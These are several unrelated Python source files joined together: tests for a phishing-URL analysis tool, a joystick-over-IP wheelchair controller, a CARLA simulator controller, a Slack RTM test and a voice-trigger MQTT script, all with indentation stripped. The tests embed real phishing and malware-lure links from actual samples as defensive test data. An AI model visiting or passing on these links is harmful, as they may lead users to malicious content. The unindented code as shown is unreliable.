url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.enable_module('analysis_module_live_browser_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 1)
file_observable = file_observables[0]
analysis = file_observable.get_analysis(LiveBrowserAnalysis)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 1)
file_observable = file_observables[0]
self.assertEquals(file_observable.value, 'crawlphish/localhost_0/localhost_000.png')
@force_alerts
def test_live_browser_404(self):
"""We should not download screenshots for URLs that returned a 404 error message."""
from saq.modules.url import CrawlphishAnalysisV2
from saq.modules.url import LiveBrowserAnalysis
root = create_root_analysis()
root.initialize_storage()
# this file does not exist
url = root.add_observable(F_URL, 'http://localhost:{}/test_data/live_browser.dne.html'.format(LOCAL_PORT))
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_crawlphish', 'test_groups')
engine.enable_module('analysis_module_live_browser_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
analysis = url.get_analysis(CrawlphishAnalysisV2)
file_observables = analysis.get_observables_by_type(F_FILE)
self.assertEquals(len(file_observables), 0)
def test_protected_url_outlook_safelinks(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url = root.add_observable(F_URL, 'https://na01.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.getbusinessready.com.au%2FInvoice-Number-49808%2F&data=02%7C01%7Ccyoung%40northernaviationservices.aero%7C8a388036cbf34f90ec5808d5724be7ed%7Cfc01978435d14339945c4161ac91c300%7C0%7C0%7C636540592704791165&sdata=%2FNQGqAp09WTNgnVnpoWIPcYNVAYsJ11ULuSS7cCsS3Q%3D&reserved=0')
url.add_directive(DIRECTIVE_CRAWL) # not actually going to crawl, just testing that it gets copied over
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_OUTLOOK_SAFELINKS
analysis = url.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_OUTLOOK_SAFELINKS)
self.assertEquals(analysis.extracted_url, 'http://www.getbusinessready.com.au/Invoice-Number-49808/')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
def test_protected_url_dropbox(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url_with_dl0 = root.add_observable(F_URL, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=0')
url_with_dl1 = root.add_observable(F_URL, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=1')
url_without_dl = root.add_observable(F_URL, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip')
url_with_dl0.add_directive(DIRECTIVE_CRAWL) # not actually going to crawl, just testing that it gets copied over
url_with_dl1.add_directive(DIRECTIVE_CRAWL)
url_without_dl.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url_with_dl0 = root.get_observable(url_with_dl0.id)
url_with_dl1 = root.get_observable(url_with_dl1.id)
url_without_dl = root.get_observable(url_without_dl.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_DROPBOX
analysis = url_with_dl0.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_DROPBOX)
self.assertEquals(analysis.extracted_url, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=1')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
analysis = url_with_dl1.get_analysis(ProtectedURLAnalysis)
self.assertFalse(analysis)
analysis = url_without_dl.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_DROPBOX)
self.assertEquals(analysis.extracted_url, 'https://www.dropbox.com/s/ezdhsvdxf6wrxk6/RFQ-012018-000071984-13-Rev.1.zip?dl=1')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
def test_protected_url_google_drive(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url = root.add_observable(F_URL, 'https://drive.google.com/file/d/1ls_eBCsmf3VG_e4dgQiSh_5VUM10b9s2/view')
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_GOOGLE_DRIVE
analysis = url.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_GOOGLE_DRIVE)
self.assertEquals(analysis.extracted_url, 'https://drive.google.com/uc?authuser=0&id=1ls_eBCsmf3VG_e4dgQiSh_5VUM10b9s2&export=download')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
def test_protected_url_sharepoint(self):
root = create_root_analysis()
root.initialize_storage()
# taken from an actual sample
url = root.add_observable(F_URL, 'https://lahia-my.sharepoint.com/:b:/g/personal/secure_onedrivemsw_bid/EVdjoBiqZTxMnjAcDW6yR4gBqJ59ALkT1C2I3L0yb_n0uQ?e=naeXYD')
url.add_directive(DIRECTIVE_CRAWL)
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_protected_url_analyzer', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root.load()
url = root.get_observable(url.id)
from saq.modules.url import ProtectedURLAnalysis, PROTECTION_TYPE_SHAREPOINT
analysis = url.get_analysis(ProtectedURLAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(analysis.protection_type, PROTECTION_TYPE_SHAREPOINT)
from urllib.parse import urlparse, parse_qs
parsed_url = urlparse(analysis.extracted_url)
self.assertEquals(parsed_url.path, '/personal/secure_onedrivemsw_bid/_layouts/15/download.aspx')
parsed_qs = parse_qs(parsed_url.query)
self.assertEquals(parsed_qs['e'][0], 'naeXYD')
self.assertEquals(parsed_qs['share'][0], 'EVdjoBiqZTxMnjAcDW6yR4gBqJ59ALkT1C2I3L0yb_n0uQ')
extracted_url = analysis.get_observables_by_type(F_URL)
self.assertEquals(len(extracted_url), 1)
extracted_url = extracted_url[0]
self.assertTrue(extracted_url.has_directive(DIRECTIVE_CRAWL))
|
JoyServerLeftStick.py
|
#!/python3
# joystick based on: https://www.kernel.org/doc/Documentation/input/joystick-api.txt
import socket, sys, os, struct, array, threading
from time import *
from fcntl import ioctl
from can2RNET import *
debug = False
#host = '192.168.43.47' # FOR COOLPAD hotspot
#host = '192.168.43.83' # FOR LG hotspot
#host = '192.168.43.46' # FOR ALCATEL hotspot
host = '192.168.100.2' #
#host = 'localhost'
port = 13337
deadrange = 16
maxjoyposition = 100
if len(sys.argv) != 2:
print('Using hardcoded IP address!')
#sys.exit(0)
elif len(sys.argv) == 2:
host = sys.argv[1]
class X360:
axis_map = []
button_map = []
xthreshold = deadrange * 0x10000 / 128
ythreshold = deadrange * 0x10000 / 128
joyx = 0
joyy = 0
exbuf = ""
outstr = "0000"
# We'll store the states here.
axis_states = {}
button_states = {}
# These constants were borrowed from linux/input.h
axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
0x06 : 'trottle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
0x12f : 'dead',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
def init_joystick(self):
if debug:
# Iterate over the joystick devices.
print('Available devices:')
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print(' /dev/input/%s' % (fn))
# Open the joystick device.
try:
fn = '/dev/input/js0'
if debug:
print('Opening %s...' % fn)
jsdev = open(fn, 'rb', buffering=0)
except IOError:
print ('No joystick at ' + fn)
return ('')
#jsdev = os.open(fn, 'rb', os.O_RDONLY|os.O_NONBLOCK)
# Get the device name.
#buf = bytearray(63)
buf = bytearray([0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf
if debug:
print('Device name: %s' % js_name)
# Get number of axes and buttons.
buf = array.array('B', [0] )
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0] )
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for axis in buf[:num_axes]:
axis_name = self.axis_names.get(axis, 'unknown(0x%02x)' % axis)
self.axis_map.append(axis_name)
self.axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = self.button_names.get(btn, 'unknown(0x%03x)' % btn)
self.button_map.append(btn_name)
self.button_states[btn_name] = 0
if debug:
print ('%d axes found: %s' % (num_axes, ', '.join(self.axis_map)))
print ('%d buttons found: %s' % (num_buttons, ', '.join(self.button_map)))
return (jsdev)
def dec2hex(self, dec,hexlen): #convert dec to hex with leading 0s and no '0x'
h=hex(int(dec))[2:]
l=len(h)
if h[l-1]=="L":
l-=1 #strip the 'L' that python int sticks on
if h[l-2]=="x":
h= '0'+hex(int(dec))[1:]
return ('0'*hexlen+h)[l:l+hexlen]
def joyread_thread(self, jsdev):
global joyx
global joyy
while True:
evbuf = jsdev.read(8)
jtime, jvalue, jtype, jnumber = struct.unpack('IhBB', evbuf)
if jtype & 0x02:
axis = self.axis_map[jnumber]
if (axis == 'x'):
if abs(jvalue) > self.xthreshold:
joyx = 0x100 + int(jvalue * maxjoyposition / 128) >> 8 &0xFF
else:
joyx = 0
elif (axis == 'y'):
if abs(jvalue) > self.ythreshold:
joyy = 0x100 - int(jvalue * maxjoyposition / 128) >> 8 &0xFF
else:
joyy = 0
def socketjoyclientthread(self,conn):
global joyx
global joyy
conn.send('This code is not correct\n'.encode())
def socketjoyserverthread(self,ipsocket,jsdev):
global joyx
global joyy
speed_range = 0
global joyevent
joypacketinterval = .01
joyipsocketthread = threading.Thread(target=x360.joyipsocketthread,args=(ipsocket,joypacketinterval,),daemon = True)
joyipsocketthread.start()
running = True
while running and joyipsocketthread.isAlive():
try:
ev = jsdev.read(8)
if len(ev) != 8:
break;
jtime, jvalue, jtype, jnumber = struct.unpack('IhBB', ev)
if jtype & 0x02:
axis = self.axis_map[jnumber]
if (axis == 'x'):
if abs(jvalue) > self.xthreshold:
#joyx = 0x100 + int(jvalue * 100 / 128) >> 8 &0xFF
joyx = jvalue
else:
joyx = 0
elif (axis == 'y'):
if abs(jvalue) > self.ythreshold:
#joyy = 0x100 - int(jvalue * 100 / 128) >> 8 &0xFF
joyy = jvalue
else:
joyy = 0
else:
print (axis)
elif jtype & 0x01:
if jvalue == 1 and jnumber == 0:
if speed_range>0:
speed_range -= 25
joyevent = 's:'+dec2hex(speed_range,2)
print("SpeedRange: " + str(speed_range))
elif jvalue == 1 and jnumber == 1:
if speed_range<100:
speed_range += 25
joyevent = 's:'+dec2hex(speed_range,2)
print("SpeedRange: " + str(speed_range))
elif jvalue == 0 and jnumber == 2:
joyevent = 'b:h0'
elif jvalue == 1 and jnumber == 2:
joyevent = 'b:h1'
else:
print("VAL:"+str(jvalue)+"NUM:"+str(jnumber))
except IOError or OSError:
print("Joystick read error")
joyx = 0
joyy = 0
running = False
def joyipsocketthread(self,ipsocket,interval,):
#now joyevent global speed_range
global joyevent
joyevent = ' :00'
nexttime = time()+interval
filtercutoff = 2
filtered_joyx=joyx
filtered_joyy=joyy
running = True
while running:
nexttime += interval
try:
filtered_joyx += joyx/filtercutoff - filtered_joyx/filtercutoff
filtered_joyy += joyy/filtercutoff - filtered_joyy/filtercutoff
joyxout = 0x100 + int(filtered_joyx * maxjoyposition / 128) >> 8 &0xFF
joyyout = 0x100 - int(filtered_joyy * maxjoyposition / 128) >> 8 &0xFF
if joyxout == 1:
joyxout = 0
if joyyout == 1:
joyyout = 0
ipsocket.send(('x:'+dec2hex(joyxout,2)+'y:'+dec2hex(joyyout,2)+joyevent+'\r').encode())
joyevent = ' :00' #one time only
except IOError as e:
if '[Errno 32]' in str(e): #Errno 32 = Broken pipe ie. client dropped
print('Client dropped connection')
running = False
if '[Errno 104]' in str(e): #Errno 104 = connection reset
print('Destination port reset by client.')
running = False
return(e)
if nexttime > time():
sleep(nexttime - time())
else:
nexttime = time()+interval
def dec2hex(dec,hexlen): #convert dec to hex with leading 0s and no '0x'
#this function is ugly and could be improved
h=hex(int(dec))[2:]
l=len(h)
if h[l-1]=="L":
l-=1 #strip the 'L' that python int sticks on
if h[l-2]=="x":
h= '0'+hex(int(dec))[1:]
return ('0'*hexlen+h)[l:l+hexlen]
if __name__ == "__main__":
main_running = True
while main_running:
#open client ip port listener
if host=='':
try:
ipsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
except socket.error:
print ("Failed to create ipsocket")
sys.exit()
print ("ip client socket created")
ipsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
ipsocket.bind((host, port))
except socket.gaierror:
print ("Hostname could not be resolved.")
sys.exit()
print ("Socket bound to port " + str(port))
#or open server ip port
else:
try:
ipsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
except socket.error:
print ("Failed to create ipsocket")
sys.exit()
print ("Joystick over IP server socket created")
ipsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print ("Attempting connection to "+host+':'+str(port))
reconnect = True
while reconnect:
try:
ipsocket.connect((host, port))
reconnect = False
except socket.gaierror:
print ("Hostname could not be resolved.")
sys.exit()
except IOError as e:
if e == '[Errno 111] Connection refused':
print("Connection refused... trying again")
reconnect = True
print ("Socket connected to:" + host + ':' + str(port))
#init /dev joystick
x360 = X360()
jsdev = x360.init_joystick()
global joyx
global joyy
global joyevent
joyx = 0
joyy = 0
if host=='':
ipsocket.listen(10)
print ('IPsocket now listening')
while threading.active_count() > 0:
conn, addr = ipsocket.accept()
print ('Connected to ' + addr[0] +':' +str(addr[1]))
socket_to_joy_thread = threading.Thread(target=x360.socketjoyclientthread,args=(conn,),daemon = True)
socket_to_joy_thread.start()
else:
if jsdev != '':
joy_to_socket_thread = threading.Thread(target=x360.socketjoyserverthread,args=(ipsocket,jsdev,),daemon = True)
joy_to_socket_thread.start()
while threading.active_count() > 0 and joy_to_socket_thread.isAlive():
sleep(0.2)
ipsocket.close()
print("Close ipsocket")
|
DataController.py
|
# Use this import to avoid cyclic imports with type checking (requires Python >= 3.7)
from __future__ import annotations
# Imports
import sys
import time
import math
import threading
import atexit
import carla
from bridge.carla.sensor.IMUSensor import IMUSensor
from bridge.carla.sensor.GNSSSensor import GNSSSensor
from bridge.carla.sensor.CameraSensor import CameraSensor
from bridge.carla.sensor.TachometerSensor import TachometerSensor
class DataController:
"""
DataController class
"""
def __init__(self, carla_ip="localhost", carla_port=2000):
"""Constructor"""
# Init class attributes
self.carla_ip = carla_ip
self.carla_port = carla_port
self.carla_client = None
self.carla_world = None
self.world_step = 0.1 # 100ms
self.carla_blueprint_library = None
self.carla_vehicle = None
self.spawn_point = None
self.vehicle_control = carla.VehicleControl()
self.external_control = True
self.sensors = []
self.can_encoder = None
self.ethernet_encoder = None
self.simulation_thread = None
self.running = False
self.real_time = False
# Init carla simulation environment
self.init_carla()
# Create simulation thread
self.simulation_thread = threading.Thread(target=self._simulation_loop, daemon=True)
# Ensure destructor is called when the object goes out of scope
atexit.register(self.__del__)
def __del__(self):
"""Destructor"""
# Leave synchronous mode
settings = self.carla_world.get_settings()
settings.synchronous_mode = False
self.carla_world.apply_settings(settings)
# Delete carla objects
self.carla_vehicle.destroy()
def init_carla(self):
"""Init carla client and setup vehicle"""
# Init carla client for interaction with simulator
self.carla_client = carla.Client(self.carla_ip, self.carla_port)
self.carla_client.set_timeout(10.0) # 10s
# Get world instance
try:
self.carla_world = self.carla_client.get_world()
print("carla_world:", self.carla_world)
except:
logger.critical(
"Unable to connect to carla world, timeout reached! Please ensure that the carla framework is running on the specified ip and port.")
sys.exit(10)
# Set fixed simulation time step
settings = self.carla_world.get_settings()
# Set fixed simulation step
settings.fixed_delta_seconds = self.world_step
# Allow physics substepping (useful for low update rate to maintain realistic physic simulation)
settings.substepping = True
settings.max_substep_delta_time = 0.01 # Recommended value <= 0.01
# (fulfill: fixed_delta_seconds <= max_substep_delta_time * max_substeps)
settings.max_substeps = min(int(math.ceil(self.world_step / 0.01)), 16)
# Enable synchronous mode
settings.synchronous_mode = True
self.carla_world.apply_settings(settings)
# Get list of available blueprints
self.carla_blueprint_library = self.carla_world.get_blueprint_library()
# Setup vehicle
vehicle_bp = self.carla_blueprint_library.find('vehicle.audi.etron')
# vehicle_bp.set_attribute('color', '60, 140, 30') # RGB color string
vehicle_bp.set_attribute('color', '255, 0, 0') # RGB color string
# Spawn the vehicle
self.spawn_point = self.carla_world.get_map().get_spawn_points()[
54] # Spawn point
self.carla_vehicle = self.carla_world.spawn_actor(
vehicle_bp, self.spawn_point)
def create_sensor(self, sensor_type, name, update_interval=1.0):
# Create sensor
sensor = None
if sensor_type == 'imu':
print("adding imu")
sensor = IMUSensor(self, name, update_interval)
elif sensor_type == 'gnss':
print("adding gnss")
sensor = GNSSSensor(self, name, update_interval)
elif sensor_type == 'camera':
print("adding camera")
sensor = CameraSensor(self, name, update_interval)
elif sensor_type == 'tachometer':
print("adding tachometer")
sensor = TachometerSensor(self, name, update_interval)
else:
raise ValueError('Selected sensor type is not supported!')
# Append sensor to list
print("adding sensor:", sensor)
self.sensors.append(sensor)
print("create sensor finished.")
def delete_sensor(self, name: str) -> None:
# Remove sensor with given name
self.sensors[:] = [
sensor for sensor in self.sensors if sensor.name != name]
def get_world(self):
"""Returns carla world
Returns
-------
carla.World
Carla world object
"""
return self.carla_world
def get_world_step(self):
return self.world_step
def set_world_step(self, step: float) -> None:
# Save new value
self.world_step = step
# Update time step in carla world
settings = self.carla_world.get_settings()
settings.fixed_delta_seconds = self.world_step
self.carla_world.apply_settings(settings)
def get_vehicle(self):
return self.carla_vehicle
def get_blueprint_library(self):
"""Returns carla blueprint library
Returns
-------
carla.BlueprintLibrary
Carla blueprint library
"""
return self.carla_blueprint_library
def save_configuration(self, file):
"""Description
Parameters
----------
argument1 : int
Description of arg1
Returns
-------
int
Returning value
"""
pass
def load_configuration(self, file):
pass
def get_sensor(self, name):
return next((sensor for sensor in self.sensors if sensor.get_name() == name), None)
def get_sensor_list(self) -> list:
return [{'name': sensor.get_name(), 'type': sensor.get_type()} for sensor in self.sensors]
def get_encoder(self, name):
pass
def apply_vehicle_control(self, control: carla.VehicleControl):
self.vehicle_control = control
def reset_simulation(self):
# Stop simulation
# self.stop_simulation()
# Reset vehicle position
if self.carla_vehicle and self.spawn_point:
self.carla_vehicle.set_transform(self.spawn_point)
# Restart simulation
# self.start_simulation()
def start_simulation(self):
self.running = True
self.simulation_thread.start()
def stop_simulation(self):
self.running = False
def _simulation_loop(self):
while self.running:
# Start clock
t_start = time.perf_counter()
# Let server compute next simulation step
frame = self.carla_world.tick()
# Handle all sensors (TODO: maybe enable multithreading in the future)
for sensor in self.sensors:
sensor.tick(frame)
# Apply control input
if self.external_control:
self.carla_vehicle.apply_control(self.vehicle_control)
else:
# Activate carla's interal autopilot to drive around
self.carla_vehicle.set_autopilot(True)
# Sleep until the end of the cycle
t_elapsed = time.perf_counter() - t_start
if self.real_time:
sleep_time = self.world_step - t_elapsed
if sleep_time > 0:
# logger.debug(
# "Cycle done. Sleep {0:3f}s until next cycle.".format(sleep_time))
time.sleep(sleep_time)
else:
logger.debug(
"Elapsed time: {:03f} (exceeded limit by {:03f}s)".format(t_elapsed, -sleep_time))
else:
pass
# logger.debug(
# "Elapsed time: {0:3f}s".format(t_elapsed))
logger.debug("Leaving simulation loop")
|
test_issue_631.py
|
import asyncio
import collections
import logging
import os
import threading
import time
import traceback
import unittest
import pytest
from integration_tests.env_variable_names import \
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from integration_tests.helpers import async_test, is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/631
"""
def setUp(self):
if not hasattr(self, "logger"):
self.logger = logging.getLogger(__name__)
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
# Stop the Client
if hasattr(self, "rtm_client") and not self.rtm_client._stopped:
self.rtm_client.stop()
@pytest.mark.skipif(condition=is_not_specified(), reason="to avoid rate_limited errors")
def test_issue_631_sharing_event_loop(self):
self.success = None
self.text = "This message was sent to verify issue #631"
self.rtm_client = RTMClient(
token=self.bot_token,
run_async=False,
loop=asyncio.new_event_loop(), # TODO: this doesn't work without this
)
# @RTMClient.run_on(event="message")
# def send_reply(**payload):
# self.logger.debug(payload)
# data = payload['data']
# web_client = payload['web_client']
# web_client._event_loop = self.loop
# # Maybe you will also need the following line uncommented
# # web_client.run_async = True
#
# if self.text in data['text']:
# channel_id = data['channel']
# thread_ts = data['ts']
# try:
# self.success = web_client.chat_postMessage(
# channel=channel_id,
# text="Thanks!",
# thread_ts=thread_ts
# )
# except Exception as e:
# # slack.rtm.client:client.py:446 When calling '#send_reply()'
# # in the 'test_rtm_client' module the following error was raised: This event loop is already running
# self.logger.error(traceback.format_exc())
# raise e
# Solution (1) for #631
@RTMClient.run_on(event="message")
def send_reply(**payload):
self.logger.debug(payload)
data = payload['data']
web_client = payload['web_client']
try:
if "text" in data and self.text in data["text"]:
channel_id = data['channel']
thread_ts = data['ts']
self.success = web_client.chat_postMessage(
channel=channel_id,
text="Thanks!",
thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
t.start()
try:
self.assertIsNone(self.success)
time.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertIsNotNone(self.success)
finally:
t.join(.3)
# Solution (2) for #631
@pytest.mark.skipif(condition=is_not_specified(), reason="this is just for reference")
@async_test
async def test_issue_631_sharing_event_loop_async(self):
self.success = None
self.text = "This message was sent to verify issue #631"
# To make run_async=True, the test method needs to be an async function + @async_test decorator
self.rtm_client = RTMClient(token=self.bot_token, run_async=True)
self.web_client = WebClient(token=self.bot_token, run_async=True)
@RTMClient.run_on(event="message")
async def send_reply(**payload):
self.logger.debug(payload)
data = payload['data']
web_client = payload['web_client']
try:
if "text" in data and self.text in data["text"]:
channel_id = data['channel']
thread_ts = data['ts']
self.success = await web_client.chat_postMessage(
channel=channel_id,
text="Thanks!",
thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
# intentionally not waiting here
self.rtm_client.start()
self.assertIsNone(self.success)
await asyncio.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=True, # all need to be async here
)
new_message = await self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
await asyncio.sleep(5)
self.assertIsNotNone(self.success)
|
live_audio_streaming.py
|
import time, logging
import os, sys, argparse
from datetime import datetime
import threading, collections, queue, os, os.path
import deepspeech
import numpy as np
import pyaudio
import wave
import webrtcvad
from halo import Halo
from scipy import signal
import cpuinfo
import paho.mqtt.client as mqtt
import json
import socket
import RPi.GPIO as GPIO
from threading import Thread
sys.path.append('/home/pi/projects/lumin/Lumin_FW_Src/audio_application/python/src')
sys.path.append('/home/pi/projects/lumin/Lumin_FW_Src/audio_application/python/lumota')
from libnyumaya import AudioRecognition,FeatureExtractor
from auto_platform import AudiostreamSource, play_command,default_libpath
from pixels import Pixels
REMOTE_SERVER = "www.google.com"
MQTT_BROKER = "ec2-52-37-146-89.us-west-2.compute.amazonaws.com"
PORT = 1883
KEEP_ALIVE = 10
flag_connected = 0
FIRMWARE_VERSION = "V_1.0"
CONFIRMATION_WAIT = 20
RECORDINGS_PATH = '/home/pi/projects/lumin/Lumin_FW_Src/audio_application/rec/'
VOLUME = 40
import os
if not os.path.exists(RECORDINGS_PATH):
os.makedirs(RECORDINGS_PATH)
#Reading CPU serial number on Linux based only
cpuserial = "0000000000000000"
info = cpuinfo.get_cpu_info()
arch = info['arch']
if arch.startswith('ARM'):
f = open('/proc/cpuinfo','r')
for line in f:
if line[0:6]=='Serial':
cpuserial = line[10:26]
DEV_UUID = "LUMIN_"+cpuserial
LOG = "ALL"
print("Device UUID : " + DEV_UUID)
#logging creation
log_file_name = "/var/log/lumin/Device_log.log"
logging.basicConfig(filename=log_file_name,format='%(asctime)s %(message)s',filemode='a')
logger=logging.getLogger()
logger.setLevel(logging.INFO)
phrases = {
'help': ['help'],
'intruder': ['intruder'],
'fire': ['fire'],
'yes': ['yes'],
'no': ['no']
}
confirmation_message = "espeak --stdout -a {0} 'Did you say {1}' | aplay -Dsysdefault"
#Function to check internet connectivity, returns true is internet is up.
def check_internet(hostname):
try:
host = socket.gethostbyname(hostname)
s = socket.create_connection((host,80),2)
s.close()
return True
except:
pass
return False
def check_button_press():
BUTTON = 17
GPIO.setmode(GPIO.BCM)
GPIO.setup(BUTTON, GPIO.IN)
while True:
pressed = not (GPIO.input(BUTTON))
if pressed:
global VOLUME
if VOLUME + 40 > 200:
VOLUME = 0
pixels.BRIGHTNESS = 5
pixels.refresh_colors()
else:
VOLUME = VOLUME + 40
pixels.BRIGHTNESS = pixels.BRIGHTNESS + 19
pixels.refresh_colors()
time.sleep(0.1)
#MQTT client connection callback function
def on_connect(client, userdata, flags, rc):
global flag_connected
flag_connected = 1
print("MQTT Connect")
logger.info("Connected to MQTT Broker")
#MQTT client disconnect callback function
def on_disconnect(client, userdata, rc):
global flag_connected
flag_connected = 0
print("MQTT Disconnect")
logger.error("Disconnected from MQTT Broker")
#Last will message JSON
last_will = {}
last_will['device_name'] = DEV_UUID
last_will['status'] = "offline"
last_will_json = json.dumps(last_will)
mqtt_client = mqtt.Client(DEV_UUID)
mqtt_client.on_connect = on_connect
mqtt_client.on_disconnect = on_disconnect
mqtt_client.will_set("status", payload=last_will_json, qos=0, retain=True)
#MQTT message trigger function, sends an MQTT trigger with details in JSON format
def send_mqtt_trigger(time_stamp,trigger_name,confirmation):
message = {}
message['timestamp'] = time_stamp
message['device_name'] = DEV_UUID
message['sound_name'] = trigger_name
message['is_confirmed'] = confirmation
json_msg = json.dumps(message)
print(json_msg)
print("Sending MQTT trigger !")
global flag_connected
if(flag_connected == 0):
mqtt_client.connect(MQTT_BROKER,PORT,KEEP_ALIVE)
mqtt_client.loop_start()
mqtt_client.publish("trigger",json_msg)
class Audio(object):
